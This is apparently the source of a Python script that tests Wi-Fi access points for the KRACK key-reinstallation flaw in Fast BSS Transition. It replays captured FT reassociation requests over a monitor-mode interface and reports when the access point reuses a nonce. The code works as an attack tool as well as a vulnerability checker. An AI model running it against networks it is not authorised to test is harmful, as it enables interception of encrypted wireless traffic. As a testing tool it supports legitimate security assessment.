123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110111112113114115116117118119120121122123124125126127128129130131132133134135136137138139140141142143144145146147148149150151152153154155156157158159160161162163164165166167168 |
- import logging
- logging.getLogger("scapy.runtime").setLevel(logging.ERROR)
- from scapy.all import *
- from libwifi import *
- import sys, socket, struct, time, subprocess, atexit, select
- IEEE_TLV_TYPE_RSN = 48
- IEEE_TLV_TYPE_FT = 55
- IEEE80211_RADIOTAP_RATE = (1 << 2)
- IEEE80211_RADIOTAP_CHANNEL = (1 << 3)
- IEEE80211_RADIOTAP_TX_FLAGS = (1 << 15)
- IEEE80211_RADIOTAP_DATA_RETRIES = (1 << 17)
- class KRAckAttackFt():
- def __init__(self, interface):
- self.nic_iface = interface
- self.nic_mon = interface + "mon"
- self.clientmac = scapy.arch.get_if_hwaddr(interface)
- self.sock = None
- self.wpasupp = None
- self.reset_client()
- def reset_client(self):
- self.reassoc = None
- self.ivs = IvCollection()
- self.next_replay = None
- def start_replay(self, p):
- assert Dot11ReassoReq in p
- self.reassoc = p
- self.next_replay = time.time() + 1
- def process_frame(self, p):
-
-
-
- if self.clientmac in [p.addr1, p.addr2] and Dot11WEP in p:
-
- payload = str(p[Dot11WEP])
-
-
- if payload.startswith("\xAA\xAA\x03\x00\x00\x00") and not payload.startswith("\xAA\xAA\x03\x00\x00\x00\x88\x8e"):
- log(ERROR, "ERROR: Virtual monitor interface doesn't seem to pass 802.11 encryption header to userland.")
- log(ERROR, " Try to disable hardware encryption, or use a 2nd interface for injection.", showtime=False)
- quit(1)
-
- if self.clientmac in [p.addr1, p.addr2] and Dot11Auth in p:
- self.reset_client()
- log(INFO, "Detected Authentication frame, clearing client state")
- elif p.addr2 == self.clientmac and Dot11ReassoReq in p:
- self.reset_client()
- if get_tlv_value(p, IEEE_TLV_TYPE_RSN) and get_tlv_value(p, IEEE_TLV_TYPE_FT):
- log(INFO, "Detected FT reassociation frame")
- self.start_replay(p)
- else:
- log(INFO, "Reassociation frame does not appear to be an FT one")
- elif p.addr2 == self.clientmac and Dot11AssoReq in p:
- log(INFO, "Detected normal association frame")
- self.reset_client()
-
- elif p.addr1 == self.clientmac and Dot11WEP in p:
- iv = dot11_get_iv(p)
- log(INFO, "AP transmitted data using IV=%d (seq=%d)" % (iv, dot11_get_seqnum(p)))
- if self.ivs.is_iv_reused(p):
- log(INFO, ("IV reuse detected (IV=%d, seq=%d). " +
- "AP is vulnerable!") % (iv, dot11_get_seqnum(p)), color="green")
- self.ivs.track_used_iv(p)
- def handle_rx(self):
- p = self.sock.recv()
- if p == None: return
- self.process_frame(p)
- def configure_interfaces(self):
- log(STATUS, "Note: disable Wi-Fi in your network manager so it doesn't interfere with this script")
-
- subprocess.check_output(["rfkill", "unblock", "wifi"])
-
- subprocess.call(["iw", self.nic_mon, "del"], stdout=subprocess.PIPE, stdin=subprocess.PIPE)
-
- subprocess.check_output(["iw", self.nic_iface, "interface", "add", self.nic_mon, "type", "monitor"])
-
-
- subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
- time.sleep(0.5)
- subprocess.check_output(["iw", self.nic_mon, "set", "type", "monitor"])
- subprocess.check_output(["ifconfig", self.nic_mon, "up"])
- def run(self):
- self.configure_interfaces()
- self.sock = MitmSocket(type=ETH_P_ALL, iface=self.nic_mon)
-
- self.wpasupp = subprocess.Popen(sys.argv[1:])
-
- while True:
- sel = select.select([self.sock], [], [], 1)
- if self.sock in sel[0]: self.handle_rx()
- if self.reassoc and time.time() > self.next_replay:
- log(INFO, "Replaying Reassociation Request")
- self.sock.send(self.reassoc)
- self.next_replay = time.time() + 1
- def stop(self):
- log(STATUS, "Closing wpa_supplicant and cleaning up ...")
- if self.wpasupp:
- self.wpasupp.terminate()
- self.wpasupp.wait()
- if self.sock: self.sock.close()
- def cleanup():
- attack.stop()
- def argv_get_interface():
- for i in range(len(sys.argv)):
- if not sys.argv[i].startswith("-i"):
- continue
- if len(sys.argv[i]) > 2:
- return sys.argv[i][2:]
- else:
- return sys.argv[i + 1]
- return None
- if __name__ == "__main__":
- if len(sys.argv) <= 1 or "--help" in sys.argv or "-h" in sys.argv:
- print "See README.md for instructions on how to use this script"
- quit(1)
-
- interface = argv_get_interface()
- if not interface:
- log(ERROR, "Failed to determine wireless interface. Specify one using the -i parameter.")
- quit(1)
- attack = KRAckAttackFt(interface)
- atexit.register(cleanup)
- attack.run()
|